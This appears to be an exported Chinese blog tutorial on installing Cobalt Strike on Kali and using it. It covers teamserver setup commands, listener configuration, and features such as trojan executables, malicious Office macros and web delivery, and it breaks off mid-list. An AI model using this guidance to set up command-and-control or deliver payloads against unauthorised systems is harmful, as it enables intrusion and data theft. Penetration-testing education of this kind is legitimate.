{"id":72428,"date":"2026-02-05T15:00:02","date_gmt":"2026-02-05T07:00:02","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/72428.html"},"modified":"2026-02-05T15:00:02","modified_gmt":"2026-02-05T07:00:02","slug":"%e9%bb%91%e5%ae%a2%e5%bf%85%e5%a4%87%e5%88%a9%e5%99%a8%ef%bc%9a%e5%a6%82%e4%bd%95%e5%9c%a8%e7%b3%bb%e7%bb%9f%e4%b8%8a%e5%ae%89%e8%a3%85%e5%92%8c%e4%bd%bf%e7%94%a8-cobaltstrike%ef%bc%9f%e9%bb%91","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/72428.html","title":{"rendered":"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b"},"content":{"rendered":"<p>\u672c\u6587\u4ec5\u7528\u4e8e\u4fe1\u606f\u5b89\u5168\u5b66\u4e60&#xff0c;\u8bf7\u9075\u5b88\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4&#xff0c;\u4e25\u7981\u7528\u4e8e\u975e\u6cd5\u9014\u5f84\u3002\u82e5\u89c2\u4f17\u56e0\u6b64\u4f5c\u51fa\u4efb\u4f55\u5371\u5bb3\u7f51\u7edc\u5b89\u5168\u7684\u884c\u4e3a&#xff0c;\u540e\u679c\u81ea\u8d1f&#xff0c;\u4e0e\u672c\u4eba\u65e0\u5173\u3002<\/p>\n<h5>\u4e00\u3001Cobalt Strike\u76f8\u5173\u4ecb\u7ecd<\/h5>\n<h6>1&#xff09;Cobalt Strike\u662f\u4ec0\u4e48?<\/h6>\n<p>Cobalt Strike&#xff08;\u7b80\u79f0CS&#xff09;\u662f\u4e00\u6b3e\u4e13\u4e1a\u7684\u56e2\u961f\u4f5c\u6218\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177&#xff0c;\u5305\u542b\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\u4e24\u4e2a\u90e8\u5206\u3002\u5b83\u7684\u4e3b\u8981\u529f\u80fd\u662f\u5728\u5df2\u7ecf\u53d6\u5f97\u653b\u51fb\u76ee\u6807\u63a7\u5236\u6743\u540e&#xff0c;\u7528\u4e8e\u6301\u4e45\u5316\u3001\u6a2a\u5411\u79fb\u52a8\u3001\u6d41\u91cf\u9690\u85cf\u4ee5\u53ca\u6570\u636e\u7a83\u53d6\u7b49\u64cd\u4f5c\u3002<\/p>\n<p>\u5f53\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u6210\u529f\u6267\u884c\u4e86 CS \u7684 payload&#xff08;\u6709\u6548\u8f7d\u8377\/\u653b\u51fb\u6a21\u5757\/\u653b\u51fb\u65b9\u5f0f&#xff09;\u65f6&#xff0c;\u5b83\u4f1a\u521b\u5efa\u4e00\u4e2a Beacon&#xff0c;\u5373\u8fdc\u7a0b\u63a7\u5236\u6728\u9a6c&#xff0c;\u901a\u8fc7\u4e0e C2 \u670d\u52a1\u5668\u5efa\u7acb\u8fde\u63a5&#xff0c;\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u8fdc\u7a0b\u63a7\u5236\u88ab\u653b\u51fb\u4e3b\u673a\u5e76\u4e14\u83b7\u53d6\u6240\u9700\u4fe1\u606f\u3002<\/p>\n<p>C2 \u662f Command &amp; Control server \u7684\u7f29\u5199&#xff0c;\u4e5f\u5c31\u662f\u547d\u4ee4\u4e0e\u63a7\u5236\u670d\u52a1\u5668&#xff0c;\u662f\u88ab\u653b\u51fb\u4e3b\u673a\u4e0e\u653b\u51fb\u8005\u4e4b\u95f4\u901a\u4fe1\u7684\u4e2d\u5fc3\u8282\u70b9\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 C2 \u670d\u52a1\u5668\u4e0b\u53d1\u6307\u4ee4\u3001\u63a5\u6536\u53cd\u9988\u5e76\u63a7\u5236\u88ab\u653b\u51fb\u4e3b\u673a\u7684\u884c\u4e3a&#xff0c;\u5b9e\u73b0\u6e17\u900f\u6d4b\u8bd5\u7b49\u5404\u79cd\u76ee\u7684\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed32dd6.png\" alt=\"\" \/><\/p>\n<ul>\n<li>adscript&#xff1a;\u62d3\u5c55\u5e94\u7528\u7684\u811a\u672c\u3002<\/li>\n<li>c2lint&#xff1a;\u7528\u4e8e\u68c0\u67e5 profile \u7684\u9519\u8bef\u5f02\u5e38\u3002<\/li>\n<li>teamserver&#xff1a;Cobalt Strike \u7684\u670d\u52a1\u7aef\u7a0b\u5e8f&#xff0c;\u7528\u4e8e\u5728\u88ab\u653b\u51fb\u76ee\u6807\u7684\u4e3b\u673a\u4e0a\u8fd0\u884c&#xff0c;\u63d0\u4f9b\u6307\u4ee4\u5e76\u63a7\u5236\u88ab\u653b\u51fb\u4e3b\u673a\u3002<\/li>\n<li>cobaltstrike\u3001cobaltstrike.jar&#xff1a;Cobalt Strike \u7684\u5ba2\u6237\u7aef\u7a0b\u5e8f&#xff0c;\u91c7\u7528Java\u8de8\u5e73\u53f0&#xff0c;\u7528\u4e8e\u4e0e\u670d\u52a1\u7aef\u7a0b\u5e8f\u901a\u4fe1\u548c\u4ea4\u4e92&#xff0c;\u5b8c\u6210\u6e17\u900f\u6d4b\u8bd5\u4efb\u52a1\u3002<\/li>\n<li>logs&#xff1a;\u8bb0\u5f55\u4e0e\u56fd\u6807\u4e3b\u673a\u76f8\u5173\u4fe1\u606f\u7684\u76ee\u5f55&#xff0c;\u5bf9\u6e17\u900f\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u7684\u8ffd\u8e2a\u548c\u5206\u6790\u975e\u5e38\u6709\u5e2e\u52a9\u3002<\/li>\n<li>update.jar&#xff1a;\u7528\u4e8e\u66f4\u65b0 Cobalt Strike \u7684\u5de5\u5177\u3002<\/li>\n<li>csthird-party&#xff1a;\u5b58\u653e\u7b2c\u4e09\u65b9\u5de5\u5177\u7684\u76ee\u5f55\u3002<\/li>\n<\/ul>\n<p>\u6700\u6838\u5fc3\u7684\u662f teamserver \u548c cobaltstrike.jar&#xff0c;\u5206\u522b\u4ee3\u8868\u4e86 Cobalt Strike \u7684\u670d\u52a1\u7aef\u548c\u5ba2\u6237\u7aef\u3002\u670d\u52a1\u7aef\u7528\u4e8e\u63a7\u5236\u88ab\u653b\u51fb\u4e3b\u673a&#xff0c;\u800c\u5ba2\u6237\u7aef\u7528\u4e8e\u4e0e\u670d\u52a1\u7aef\u901a\u4fe1\u548c\u6267\u884c\u6e17\u900f\u6d4b\u8bd5\u4efb\u52a1\u3002\u5176\u4ed6\u5de5\u5177\u548c\u6587\u4ef6\u90fd\u662f\u4e3a\u4e86\u8f85\u52a9\u548c\u589e\u5f3a Cobalt Strike \u7684\u529f\u80fd\u3002\u8bf7\u8bb0\u4f4f&#xff0c;\u5728\u4f7f\u7528 Cobalt Strike \u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5\u65f6&#xff0c;\u52a1\u5fc5\u9075\u5b88\u6cd5\u5f8b\u6cd5\u89c4&#xff0c;\u5e76\u83b7\u5f97\u5408\u6cd5\u6388\u6743\u3002<\/p>\n<h6>2&#xff09;kali\u5b89\u88c5cobaltstrike<\/h6>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed4cf8b.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed63cac.png\" alt=\"\" \/><\/p>\n<p>\u5728 cs4.0\u76ee\u5f55\u4e0b\u65b0\u5efa\u7ec8\u7aef&#xff0c;\u7136\u540e\u8fd0\u884c\u670d\u52a1\u7aefteamserver<\/p>\n<p># \u7ed9\u4e88\u670d\u52a1\u7aef\u7a0b\u5e8fteamserver \u6267\u884c\u6743\u9650&#xff08;\u5728linux\u4e2d\u590d\u5236\u8fdb\u6765\u7684\u6587\u4ef6\u9ed8\u8ba4\u662f\u6ca1\u6709\u6267\u884c\u6743\u9650\u7684&#xff09;<br \/>\nchmod &#043;x teamserver<\/p>\n<p># \u53ef\u4ee5\u67e5\u770bkali\u7684IP\u5730\u5740&#xff08;\u53ef\u9009&#xff09;<br \/>\nifconfig eth0<\/p>\n<p># # \u8fd0\u884c\u670d\u52a1\u7aef\u7a0b\u5e8f&#xff0c;192.168.0.104\u662f\u672c\u673aIP&#xff0c;user   \u662f\u8981\u8bbe\u7f6e\u7684\u8fde\u63a5\u5bc6\u7801&#xff08;\u53ef\u6539&#xff09;<br \/>\n.\/teamserver 192.168.0.104 user<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed7ddfc.png\" alt=\"\" \/><\/p>\n<p>\u5728 cs4.0\u76ee\u5f55\u4e0b\u65b0\u5efa\u7ec8\u7aef&#xff0c;\u8f93\u5165\u5982\u4e0b\u547d\u4ee4\u8fd0\u884c\u5ba2\u6237\u7aef\u7a0b\u5e8f<\/p>\n<p>java -Dfile.encoding&#061;UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads&#061;4 -XX:&#043;AggressiveHeap -XX:&#043;UseParallelGC -jar cobaltstrike.jar<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed8feea.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fedbd2d4.png\" alt=\"\" \/><\/p>\n<p>\u65b0\u5efa\u914d\u7f6e\u6587\u4ef6&#xff0c;\u8fde\u63a5CS\u670d\u52a1\u5668<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065958-69843fee01ed4.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065958-69843fee5814b.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065958-69843fee67a65.png\" alt=\"\" \/><\/p>\n<h6>3&#xff09;\u5e38\u7528\u529f\u80fd<\/h6>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065958-69843feebddfe.png\" alt=\"\" \/><\/p>\n<li>\n<p>\u94fe\u63a5\u5230\u53e6\u5916\u4e00\u4e2a\u56e2\u961f\u670d\u52a1\u5668&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u9700\u8981\u4e0e\u5176\u4ed6\u56e2\u961f\u670d\u52a1\u5668\u5efa\u7acb\u8fde\u63a5\u4ee5\u83b7\u53d6\u8fdb\u4e00\u6b65\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<\/li>\n<li>\n<p>\u65ad\u5f00\u670d\u52a1\u5668\u8fde\u63a5&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u9700\u8981\u65ad\u5f00\u4e0e\u76ee\u6807\u670d\u52a1\u5668\u7684\u8fde\u63a5\u4ee5\u907f\u514d\u88ab\u53d1\u73b0\u3002<\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u6240\u6709\u76d1\u542c\u5668&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u8bbe\u7f6e\u76d1\u542c\u5668\u4ee5\u6355\u83b7\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u6d41\u91cf\u6216\u8bbf\u95ee\u51ed\u636e\u3002<\/p>\n<\/li>\n<li>\n<p>\u5207\u6362\u4e3apivot\u56fe[\u670d\u52a1\u5668\u8282\u70b9]&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528Pivot\u6280\u672f\u5c06\u653b\u51fb\u70b9\u4ece\u4e00\u4e2a\u7cfb\u7edf\u8f6c\u79fb\u5230\u53e6\u4e00\u4e2a\u7cfb\u7edf\u3002<\/p>\n<\/li>\n<li>\n<p>\u5207\u6362\u4e3a\u4f1a\u8bdd\u5217\u8868&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528\u4f1a\u8bdd\u5217\u8868\u6765\u7ba1\u7406\u5df2\u7ecf\u5efa\u7acb\u7684\u4f1a\u8bdd\u3002<\/p>\n<\/li>\n<li>\n<p>\u5207\u6362\u4e3a\u76ee\u6807\u5217\u8868&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528\u76ee\u6807\u5217\u8868\u6765\u7ba1\u7406\u653b\u51fb\u76ee\u6807\u3002<\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u51ed\u636e\u4fe1\u606f&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5c1d\u8bd5\u83b7\u53d6\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u8d26\u6237\u51ed\u636e\u4ee5\u83b7\u53d6\u66f4\u9ad8\u7684\u6743\u9650\u3002<\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u4e0b\u8f7d\u6587\u4ef6&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5c1d\u8bd5\u4e0b\u8f7d\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u6587\u4ef6\u4ee5\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002<\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u952e\u76d8\u8bb0\u5f55&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528\u952e\u76d8\u8bb0\u5f55\u5668\u6765\u83b7\u53d6\u76ee\u6807\u7cfb\u7edf\u4e0a\u8f93\u5165\u7684\u4fe1\u606f\u3002<\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u5c4f\u5e55\u622a\u56fe&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528\u5c4f\u5e55\u622a\u56fe\u6765\u83b7\u53d6\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u654f\u611f\u4fe1\u606f\u3002<\/p>\n<\/li>\n<li>\n<p>\u751f\u6210stageless\u7684exe\u6728\u9a6c\u6587\u4ef6&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528stageless\u7684exe\u6728\u9a6c\u6587\u4ef6\u6765\u5bf9\u76ee\u6807\u7cfb\u7edf\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n<\/li>\n<li>\n<p>\u8bbe\u5b9ajava\u81ea\u7b7e\u540dapplet\u7a0b\u5e8f\u653b\u51fb&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528Java\u81ea\u7b7e\u540dapplet\u7a0b\u5e8f\u653b\u51fb\u76ee\u6807\u7cfb\u7edf\u3002<\/p>\n<\/li>\n<li>\n<p>\u751f\u6210\u6076\u610fOffice\u5b8f\u653b\u51fb&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7528\u6076\u610fOffice\u5b8f\u653b\u51fb\u76ee\u6807\u7cfb\u7edf\u3002<\/p>\n<\/li>\n<li>\n<p>\u5efa\u7acbweb delivery&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5efa\u7acbweb delivery\u4ee5\u5411\u76ee\u6807\u7cfb\u7edf\u63d0\u4f9b\u6076\u610f\u4ee3\u7801\u3002<\/p>\n<\/li>\n<li>\n<p>\u5728web\u670d\u52a1\u5668\u4e0a\u6258\u7ba1\u6587\u4ef6&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5c06\u6076\u610f\u6587\u4ef6\u6258\u7ba1\u5728web\u670d\u52a1\u5668\u4e0a\u3002<\/p>\n<\/li>\n<li>\n<p>\u7ba1\u7406\u5728web\u670d\u52a1\u5668\u4e0a\u7684\u5e94\u7528\u548c\u6587\u4ef6&#xff1a;\u5728\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u548c\u653b\u51fb\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u7ba1\u7406\u6258\u7ba1\u5728web\u670d\u52a1\u5668\u4e0a\u7684\u5e94\u7528\u548c\u6587\u4ef6\u3002<\/p>\n<\/li>\n<li>\n<p>\u5e2e\u52a9&#xff1a;\u63d0\u4f9b\u5e2e\u52a9\u4fe1\u606f\u3002<\/p>\n<\/li>\n<li>\n<p>\u5173\u4e8e&#xff1a;\u663e\u793a\u5173\u4e8e\u8be5\u5de5\u5177\u6216\u8f6f\u4ef6\u7684\u4fe1\u606f\u3002<\/p>\n<\/li>\n<h6>4&#xff09;Cobaltstrike\u7b80\u4ecb- \u76d1\u542c\u5668 Listener<\/h6>\n<p>1&#xff09;\u5185\u90e8 beacon<\/p>\n<p>    \u4e0e\u5916\u90e8beacon\u7c7b\u4f3c&#xff0c;\u5185\u90e8beacon\u662f\u6307\u6f5c\u4f0f\u5728\u76ee\u6807\u7cfb\u7edf\u5185\u90e8\u7684\u5c0f\u578b\u7a0b\u5e8f\u6216\u4ee3\u7801\u7247\u6bb5&#xff0c;\u5b9a\u671f\u4e0e\u547d\u4ee4\u548c\u63a7\u5236&#xff08;C2&#xff09;\u670d\u52a1\u5668\u8fdb\u884c\u901a\u4fe1&#xff0c;\u4ee5\u63d0\u4f9b\u6709\u5173\u76ee\u6807\u7cfb\u7edf\u7684\u4fe1\u606f\u6216\u63a5\u6536\u8fdb\u4e00\u6b65\u7684\u6307\u4ee4\u3002\u5185\u90e8beacon\u4e3b\u8981\u7528\u4e8e\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u8fdb\u884c\u5a01\u80c1\u4fa6\u6d4b\u548c\u5165\u4fb5\u68c0\u6d4b\u3002<\/p>\n<ul>\n<li>\n<p>Beacon DNS&#xff1a;Beacon DNS\u662f\u6307\u901a\u8fc7DNS\u534f\u8bae\u8fdb\u884c\u901a\u4fe1\u7684beacon\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528DNS\u6d41\u91cf\u6765\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u5e76\u901a\u8fc7DNS\u67e5\u8be2\u548c\u54cd\u5e94\u4e2d\u9690\u85cf\u6076\u610f\u6307\u4ee4\u6216\u6570\u636e\u3002<\/p>\n<\/li>\n<li>\n<p>Beacon HTTP&#xff1a;Beacon HTTP\u662f\u6307\u901a\u8fc7HTTP\u534f\u8bae\u8fdb\u884c\u901a\u4fe1\u7684beacon\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528HTTP\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u5e76\u901a\u8fc7HTTP\u8bf7\u6c42\u548c\u54cd\u5e94\u4e2d\u4f20\u9012\u6076\u610f\u6307\u4ee4\u6216\u6570\u636e\u3002<\/p>\n<\/li>\n<li>\n<p>Beacon HTTPS&#xff1a;Beacon HTTPS\u662f\u6307\u901a\u8fc7HTTPS\u534f\u8bae\u8fdb\u884c\u901a\u4fe1\u7684beacon\u3002\u7c7b\u4f3c\u4e8eBeacon HTTP&#xff0c;\u653b\u51fb\u8005\u4f7f\u7528\u52a0\u5bc6\u7684HTTPS\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u4ee5\u9690\u85cf\u6076\u610f\u6d3b\u52a8\u5e76\u7ed5\u8fc7\u7f51\u7edc\u5b89\u5168\u8bbe\u5907\u7684\u68c0\u6d4b\u3002<\/p>\n<\/li>\n<li>\n<p>Beacon SMB&#xff1a;Beacon SMB\u662f\u6307\u901a\u8fc7Server Message Block&#xff08;SMB&#xff09;\u534f\u8bae\u8fdb\u884c\u901a\u4fe1\u7684beacon\u3002SMB\u534f\u8bae\u5e38\u7528\u4e8eWindows\u7f51\u7edc\u5171\u4eab\u548c\u6587\u4ef6\u4f20\u8f93&#xff0c;\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528SMB\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u5e76\u901a\u8fc7SMB\u547d\u4ee4\u548c\u54cd\u5e94\u4f20\u9012\u6076\u610f\u6307\u4ee4\u6216\u6570\u636e\u3002<\/p>\n<\/li>\n<li>\n<p>Beacon TCP&#xff1a;Beacon TCP\u662f\u6307\u901a\u8fc7TCP\u534f\u8bae\u8fdb\u884c\u901a\u4fe1\u7684beacon\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528TCP\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u5e76\u5728TCP\u8fde\u63a5\u4e2d\u4f20\u9012\u6076\u610f\u6307\u4ee4\u6216\u6570\u636e\u3002<\/p>\n<\/li>\n<\/ul>\n<p>2&#xff09;\u5916\u90e8 beacon [\u4e0e\u5176\u4ed6\u5de5\u5177\u8054\u5408\u4f7f\u7528\u65f6\u4f1a\u7528\u5230]<\/p>\n<p>    \u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u6f5c\u4f0f\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u5c0f\u578b\u7a0b\u5e8f\u6216\u4ee3\u7801\u7247\u6bb5&#xff0c;\u5b9a\u671f\u4e0e\u547d\u4ee4\u548c\u63a7\u5236&#xff08;C2&#xff09;\u670d\u52a1\u5668\u8fdb\u884c\u901a\u4fe1&#xff0c;\u4ee5\u63d0\u4f9b\u6709\u5173\u76ee\u6807\u7cfb\u7edf\u7684\u4fe1\u606f\u6216\u63a5\u6536\u8fdb\u4e00\u6b65\u7684\u6307\u4ee4\u3002\u5916\u90e8beacon\u8868\u793a\u8fd9\u4e2abeacon\u7a0b\u5e8f\u4e0e\u76ee\u6807\u7cfb\u7edf\u4e4b\u5916\u7684\u5176\u4ed6\u5de5\u5177\u6216\u7cfb\u7edf\u8fdb\u884c\u8054\u5408\u4f7f\u7528\u3002<\/p>\n<ul>\n<li>\n<p>Foreign HTTP&#xff1a;\u4f7f\u7528HTTP\u534f\u8bae\u8fdb\u884c\u8de8\u57df\u901a\u4fe1\u3002\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d&#xff0c;\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5229\u7528HTTP\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u4ee5\u7ed5\u8fc7\u7f51\u7edc\u5b89\u5168\u8bbe\u5907\u7684\u68c0\u6d4b&#xff0c;\u5e76\u901a\u8fc7\u6b63\u5e38\u7684HTTP\u6d41\u91cf\u4f20\u8f93\u88ab\u7a83\u53d6\u7684\u6570\u636e\u3002<\/p>\n<\/li>\n<li>\n<p>Foreign HTTPS&#xff1a;\u4f7f\u7528HTTPS\u534f\u8bae\u8fdb\u884c\u8de8\u57df\u901a\u4fe1\u3002HTTPS\u662f\u4e00\u79cd\u52a0\u5bc6\u7684HTTP\u534f\u8bae&#xff0c;\u901a\u8fc7\u4f7f\u7528SSL\/TLS\u52a0\u5bc6\u6280\u672f\u6765\u4fdd\u62a4\u6570\u636e\u7684\u673a\u5bc6\u6027\u548c\u5b8c\u6574\u6027\u3002\u653b\u51fb\u8005\u53ef\u80fd\u4f7f\u7528HTTPS\u6d41\u91cf\u4e0e\u53d7\u611f\u67d3\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1&#xff0c;\u4ee5\u9690\u85cf\u6076\u610f\u6d3b\u52a8\u5e76\u7ed5\u8fc7\u7f51\u7edc\u5b89\u5168\u8bbe\u5907\u7684\u68c0\u6d4b\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u6253\u5f00\u76d1\u542c\u5668\u914d\u7f6e<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065958-69843feeca5e8.png\" alt=\"\" \/><\/p>\n<p>\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u76d1\u542c\u5668 -&gt; \u586b\u5199\u76d1\u542c\u5668\u540d\u79f0&#xff08;\u968f\u4fbf\u5199&#xff0c;\u4e0d\u91cd\u590d\u5c31\u884c&#xff09;-&gt; \u9009\u62e9\u6709\u6548\u8f7d\u8377\/\u653b\u51fb\u6a21\u5757\/\u653b\u51fb\u65b9\u5f0f<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065959-69843fef65743.png\" alt=\"\" \/><\/p>\n<p>\u6dfb\u52a0HTTP\u4e3b\u673a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065959-69843fefc4156.png\" alt=\"\" \/><\/p>\n<p>\u6dfb\u52a0\u8981\u5728\u5f00\u542f\u76d1\u542c\u7684HTTP\u7aef\u53e3&#xff1a;0-65535 \u5728\u8fd9\u4e2a\u53d6\u503c\u8303\u56f4\u4e2d1023\u4ee5\u4e0b\u7684\u7aef\u53e3\u5df2\u7ecf\u5206\u914d\u7ed9\u4e86\u5e38\u7528\u7684\u4e00\u4e9b\u5e94\u7528\u7a0b\u5e8f&#xff0c;\u5efa\u8bae\u5f80\u5927\u7684\u586b&#xff0c;\u907f\u514d\u7aef\u53e3\u88ab\u5360\u7528&#xff08;\u91cd\u590d&#xff09;\u2013&gt; \u6700\u540e\u4fdd\u5b58\u5373\u53ef<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070000-69843ff02a63f.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070000-69843ff08a316.png\" alt=\"\" \/><\/p>\n<h6>5&#xff09;Cobaltstrike\u7b80\u4ecb &#8211; Attacks&#xff08;\u653b\u51fb&#xff09;<\/h6>\n<p>Packages&#xff08;\u5c01\u88c5\/\u751f\u6210\u540e\u95e8&#xff09;&#xff1a;<\/p>\n<ul>\n<li>HTML Application \u751f\u6210hta HTML\u5e94\u7528\u7a0b\u5e8f<\/li>\n<li>MS Office Macro \u751f\u6210\u6076\u610f\u5b8f\u653e\u5165 office \u6587\u4ef6<\/li>\n<li>Payload Generator \u751f\u6210\u5404\u79cd\u8bed\u8a00\u7248\u672c\u7684 payload<\/li>\n<li>Windows Executable \u53ef\u6267\u884c\u6587\u4ef6 \u9ed8\u8ba4x86 \u52fe\u9009x64\u8868\u793a\u751f\u6210\u00d764<\/li>\n<li>Windows Executable(S) stageless\u751f\u6210\u5168\u529f\u80fd\u88ab\u63a7\u7aef<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205070000-69843ff0b85f5.png\" alt=\"\" \/><\/p>\n<p>Web Drive-by&#xff1a;<\/p>\n<ul>\n<li>Manage \u7ba1\u7406\u5f53\u524d Team Server 